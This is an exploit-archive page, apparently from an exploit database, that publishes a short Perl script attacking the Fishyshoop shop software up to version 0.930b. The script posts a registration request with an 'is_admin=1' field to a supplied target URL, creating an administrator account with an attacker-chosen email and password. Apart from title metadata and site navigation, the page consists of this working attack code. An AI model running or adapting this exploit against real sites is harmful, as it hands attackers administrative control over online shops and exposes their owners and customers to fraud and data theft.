Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Fishyshoop <= 0.930b Remote Add Administrator Account Exploit
# Published : 2006-12-25
# Author : James Gray
# Previous Title : myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability
# Next Title : Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability

#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

# www.Syue.com [2006-12-25]